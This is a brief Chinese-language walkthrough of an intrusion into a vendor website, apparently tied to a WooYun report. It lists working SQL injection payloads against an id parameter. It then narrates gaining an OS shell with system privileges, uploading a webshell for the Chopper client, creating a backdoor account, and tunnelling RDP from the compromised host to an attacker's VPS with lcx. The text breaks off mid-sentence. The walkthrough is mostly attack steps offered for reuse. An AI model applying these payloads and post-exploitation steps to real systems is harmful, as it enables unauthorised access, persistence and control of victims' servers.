0x01 首先发现目标 http://xxxxx/themes/list.php?id=86存在sql注入(某乌云厂商) --- Parameter: id (GET) Type:boolean-based blind Title: ANDboolean-based blind - WHERE or HAVING clause Payload: id=86AND 4127=4127
Type:error-based Title: MySQL>= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=86AND (SELECT 8388 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT(ELT(8388=8388,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/ORtime-based blind Title: MySQL>= 5.0.12 AND time-based blind (SELECT) Payload: id=86AND (SELECT * FROM (SELECT(SLEEP(5)))fkAj)
Type: UNIONquery Title: GenericUNION query (NULL) - 16 columns Payload: id=86 UNION ALL SELECTNULL,CONCAT(0x7176627071,0x6c4361515457676a6b51,0x71706a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
大量数据 发现是dba权限
执行—os-shell 执行命令 system权限 上传点 上传webshell 链接菜刀
新建一个用户 wooyun 不能远程连接我需要端口转发 准备工具 lcx
肉鸡端执行lcx.exe -slave 你的IP 2333 127.0.0.1 3389 在远程vps上 执行 |